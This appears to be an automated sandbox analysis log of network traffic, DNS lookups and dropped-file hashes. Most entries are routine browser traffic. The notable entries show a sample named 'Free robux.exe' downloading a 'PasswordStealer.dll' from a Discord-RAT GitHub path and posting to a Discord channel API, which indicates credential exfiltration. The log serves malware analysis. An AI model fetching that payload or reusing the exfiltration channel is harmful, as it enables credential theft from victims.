GET https://www.youtube.com/s/desktop/b1a23d83/jsbin/webcomponents-sd.vflset/webcomponents-sd.jsHTTP Request
GET https://www.youtube.com/s/desktop/b1a23d83/jsbin/intersection-observer.min.vflset/intersection-observer.min.jsHTTP Request
GET https://www.youtube.com/s/desktop/b1a23d83/jsbin/scheduler.vflset/scheduler.jsHTTP Request
GET https://www.youtube.com/s/desktop/b1a23d83/jsbin/www-i18n-constants-en_US.vflset/www-i18n-constants.jsHTTP Request
GET https://www.youtube.com/s/desktop/b1a23d83/cssbin/www-main-desktop-home-page-skeleton.cssHTTP Request
GET https://www.youtube.com/s/desktop/b1a23d83/jsbin/www-tampering.vflset/www-tampering.jsHTTP Request
GET https://www.youtube.com/s/desktop/b1a23d83/jsbin/spf.vflset/spf.jsHTTP Request
GET https://www.youtube.com/s/desktop/b1a23d83/jsbin/network.vflset/network.jsHTTP Request
GET https://www.youtube.com/s/desktop/b1a23d83/cssbin/www-onepick.cssHTTP Request
GET https://www.youtube.com/s/_/ytmainappweb/_/ss/k=ytmainappweb.kevlar_base.LSec7Jwfb8w.L.B1.O/am=AABBAg/d=0/br=1/rs=AGKMywFNrzpfBvS2ypCotqks7bJEMYSxLQHTTP Request
GET https://www.youtube.com/s/desktop/b1a23d83/cssbin/www-main-desktop-watch-page-skeleton.css -
1.6kB 6.3kB 12 10
HTTP Request
GET https://i.ytimg.com/generate_204 -
64.233.167.84:443https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=entls, http2msedge.exe2.1kB 7.5kB 16 16
HTTP Request
GET https://accounts.google.com/ServiceLogin?service=youtube&uilel=3&passive=true&continue=https%3A%2F%2Fwww.youtube.com%2Fsignin%3Faction_handle_signin%3Dtrue%26app%3Ddesktop%26hl%3Den%26next%3D%252Fsignin_passive%26feature%3Dpassive&hl=en -
216.58.213.4:443https://www.google.com/js/th/9qOIBUG39ay8paWZdcfdyc9gzYxr5h8ybqzR89LD9TM.jstls, http2msedge.exe2.5kB 28.3kB 29 29
HTTP Request
GET https://www.google.com/js/th/9qOIBUG39ay8paWZdcfdyc9gzYxr5h8ybqzR89LD9TM.js -
74.125.3.169:443https://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&ctier=L&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCtls, httpmsedge.exe2.5kB 6.2kB 10 10
HTTP Request
GET https://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&ctier=L&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCHTTP Response
403 -
74.125.3.169:443https://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCtls, httpmsedge.exe2.5kB 6.2kB 10 10
HTTP Request
GET https://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCHTTP Response
403 -
74.125.3.169:443https://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&ctier=L&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCtls, httpmsedge.exe2.5kB 1.7kB 8 7
HTTP Request
GET https://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&ctier=L&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCHTTP Response
403 -
74.125.3.169:443https://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCtls, httpmsedge.exe2.5kB 1.7kB 8 7
HTTP Request
GET https://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCHTTP Response
403 -
142.250.187.206:443https://play.google.com/log?format=json&hasfast=true&authuser=0tls, http2msedge.exe1.9kB 8.5kB 14 18
HTTP Request
OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0HTTP Request
OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0 -
793 B 6.9kB 6 8
-
74.125.3.169:443https://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&ctier=L&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCtls, httpmsedge.exe2.5kB 1.7kB 8 8
HTTP Request
GET https://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&ctier=L&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCHTTP Response
403 -
74.125.3.169:443https://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCtls, httpmsedge.exe2.5kB 1.7kB 8 7
HTTP Request
GET https://rr4---sn-q4fl6nsd.googlevideo.com/videoplayback?expire=3320757741&ei=VZASgnCG_AU7KO8MQpApVdf&ip=99.16.95.33&id=o-AFfQeIHHQd9rkyoZ5DnNC3murNt6BPY7wOomp3l7MSEJ9&itag=18&source=youtube&requiressl=yes&mh=X6&mm=347%2C55860%2C42520&mn=5ag74%2CdN98M%2C4m3IL&ms=5ag74%2CdN98M%2C4m3IL&mv=m&mvi=3&pl=74&initcwndbps=7579745&siu=3&spc=otlD_S8SuJ5O3g9wDc596Kr3ZaOQAGwOv0TzoOCxMkf3&vprv=3&svpuc=3&mime=video%2Fmp4&ns=PDdVPjSJip7tDEqZPchcGzJJ&cnr=74&ratebypass=yes&dur=21314811&lmt=3467506469419673&mt=3320757741&fvip=3&c=WEB&txp=7579745&n=Ct3hxqydqfFZqHla&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Csiu%2Cspc%2Cvprv%2Csvpuc%2Cmime%2Cns%2Ccnr%2Cratebypass%2Cdur%2Clmt&sig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeC&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=08fp66tH4ZS10Jy4bUCpKrt9iB79Gx6J3j0eL2Ij50IFbK_1-TgwcyMgm8NmBOtyb1bnZrz0sKuI7cUADaGFpglpY6SeuCj-rz0V06DHZZeCHTTP Response
403 -
142.250.178.10:443https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Createtls, http2msedge.exe1.7kB 6.7kB 13 15
HTTP Request
OPTIONS https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create -
142.250.180.14:443https://consent.youtube.com/save?continue=https://www.youtube.com/&gl=GB&m=0&pc=yt&x=5&src=2&hl=en&bl=721127043&cm=2&set_eom=truetls, http2msedge.exe1.9kB 9.9kB 13 17
HTTP Request
POST https://consent.youtube.com/save?continue=https://www.youtube.com/&gl=GB&m=0&pc=yt&x=5&src=2&hl=en&bl=721127043&cm=2&set_eom=true -
185.199.110.133:443https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStealer.dlltls, httpFree robux.exe1.7kB 62.1kB 27 50
HTTP Request
GET https://raw.githubusercontent.com/moom825/Discord-RAT-2.0/master/Discord%20rat/Resources/PasswordStealer.dllHTTP Response
200 -
162.159.128.233:443https://discord.com/api/v9/channels/1334873496756424744/messagestls, httpFree robux.exe1.2kB 3.2kB 9 10
HTTP Request
POST https://discord.com/api/v9/channels/1334873496756424744/messagesHTTP Response
200 -
162.159.128.233:443https://discord.com/api/v9/channels/1334873496756424744/messagestls, httpFree robux.exe1.2kB 3.3kB 9 11
HTTP Request
POST https://discord.com/api/v9/channels/1334873496756424744/messagesHTTP Response
200
-
64 B 144 B 1 1
DNS Request
gateway.discord.gg
DNS Response
162.159.133.234162.159.136.234162.159.135.234162.159.134.234162.159.130.234
-
57 B 137 B 1 1
DNS Request
discord.com
DNS Response
162.159.128.233162.159.138.232162.159.135.232162.159.137.232162.159.136.232
-
74 B 136 B 1 1
DNS Request
234.133.159.162.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
131.31.126.40.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
11.153.16.2.in-addr.arpa
-
64 B 80 B 1 1
DNS Request
geolocation-db.com
DNS Response
159.89.102.253
-
72 B 158 B 1 1
DNS Request
138.201.86.20.in-addr.arpa
-
74 B 136 B 1 1
DNS Request
233.128.159.162.in-addr.arpa
-
73 B 140 B 1 1
DNS Request
253.102.89.159.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
198.187.3.20.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
13.153.16.2.in-addr.arpa
-
60 B 76 B 1 1
DNS Request
www.google.com
DNS Response
216.58.213.4
-
4.5kB 21.4kB 35 36
-
74 B 112 B 1 1
DNS Request
227.179.250.142.in-addr.arpa
-
74 B 113 B 1 1
DNS Request
202.187.250.142.in-addr.arpa
-
71 B 138 B 1 1
DNS Request
4.213.58.216.in-addr.arpa
-
65 B 105 B 1 1
DNS Request
clients2.google.com
DNS Response
216.58.212.206
-
3.8kB 8.1kB 11 12
-
656 B 10
-
73 B 173 B 1 1
DNS Request
206.212.58.216.in-addr.arpa
-
63 B 100 B 1 1
DNS Request
chrome.google.com
DNS Response
142.250.179.238
-
74 B 113 B 1 1
DNS Request
238.179.250.142.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
14.227.111.52.in-addr.arpa
-
57 B 73 B 1 1
DNS Request
youtube.com
DNS Response
142.250.200.46
-
61 B 335 B 1 1
DNS Request
www.youtube.com
DNS Response
142.250.200.14172.217.169.78216.58.212.206216.58.213.14142.250.187.206172.217.16.238172.217.169.14216.58.201.110142.250.200.46142.250.187.238172.217.169.46142.250.180.14216.58.204.78142.250.179.238142.250.178.14
-
73 B 112 B 1 1
DNS Request
46.200.250.142.in-addr.arpa
-
31.1kB 869.6kB 161 683
-
57 B 297 B 1 1
DNS Request
i.ytimg.com
DNS Response
172.217.169.22142.250.200.54142.250.178.22216.58.204.86216.58.201.118172.217.169.54142.250.179.246142.250.187.246172.217.169.86142.250.187.214216.58.212.214216.58.212.246172.217.16.246142.250.200.22142.250.180.22
-
65 B 81 B 1 1
DNS Request
accounts.google.com
DNS Response
64.233.167.84
-
3.3kB 12.5kB 14 18
-
73 B 112 B 1 1
DNS Request
14.200.250.142.in-addr.arpa
-
73 B 112 B 1 1
DNS Request
22.169.217.172.in-addr.arpa
-
73 B 142 B 1 1
DNS Request
234.16.217.172.in-addr.arpa
-
72 B 169 B 1 1
DNS Request
67.204.58.216.in-addr.arpa
-
72 B 105 B 1 1
DNS Request
84.167.233.64.in-addr.arpa
-
79 B 125 B 1 1
DNS Request
rr4---sn-q4fl6nsd.googlevideo.com
DNS Response
74.125.3.169
-
2.6kB 8.2kB 12 12
-
61 B 77 B 1 1
DNS Request
play.google.com
DNS Response
142.250.187.206
-
7.9kB 9.1kB 18 20
-
71 B 109 B 1 1
DNS Request
169.3.125.74.in-addr.arpa
-
72 B 110 B 1 1
DNS Request
3.169.217.172.in-addr.arpa
-
67 B 323 B 1 1
DNS Request
jnn-pa.googleapis.com
DNS Response
142.250.178.10142.250.187.234172.217.169.74172.217.16.234216.58.212.202172.217.169.42142.250.179.234142.250.200.42216.58.201.106142.250.187.202172.217.169.10142.250.200.10142.250.180.10216.58.204.74216.58.213.10216.58.212.234
-
6.5kB 53.1kB 30 48
-
73 B 112 B 1 1
DNS Request
10.178.250.142.in-addr.arpa
-
65 B 81 B 1 1
DNS Request
consent.youtube.com
DNS Response
142.250.180.14
-
73 B 112 B 1 1
DNS Request
14.180.250.142.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
raw.githubusercontent.com
DNS Response
185.199.110.133185.199.111.133185.199.108.133185.199.109.133
-
74 B 118 B 1 1
DNS Request
133.110.199.185.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD58c76af55119b92d356d15ffe98a210d2
SHA12174c899beb83cbf2cd549ab430612e6ce769048
SHA256283bf58804c733f376bc9213e79bf126e9a9d05408e44edb991cf7f27f80906d
SHA51281ea3faa31bb90f3c5dd3d9b4b29844837942f7f55bbf61100736fd072018cc03caa448230a3fe438de7f52cd9ff0f23f3f1b2d7758b866b2b8c18f8e3171c9b
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
356B
MD5de7c0f820981c1f80bd72fd9224ce14b
SHA17539d8dfbf1b7d61777d1058be85be11e9404079
SHA256acd4d3aeeabe08b723763dc80a1072929ff46e69e04d5ba63c6a9a4ee8c41e62
SHA512bee7bd1caf9b89205731509c4a4e64ba020c724c4c9cbd8102830b36ea5067745e0099cc2b2715c5e88c9cf6c1386db290e88d8f81ce3cb02ed7e72e356ca79c
-
Filesize
8KB
MD5a127b376b45d77f19a030bd59be75990
SHA12d7873c916afc377b003f4164e81cb77a3cae0a3
SHA256500a3356ef0be8e79df188bd6a3f3f7023fc55e0ead37d0804d31e49d924f4bf
SHA512d0baa05c7269e587ee0baad935c7df8b4101a5e16d0737d3f224bbe14bec849b9bc0a6da19454f74194ac3ba79835d98846298844c2689485e35e19c122dcbe1
-
Filesize
8KB
MD5de6897065bc94b93d5d696fb7c7a5bc2
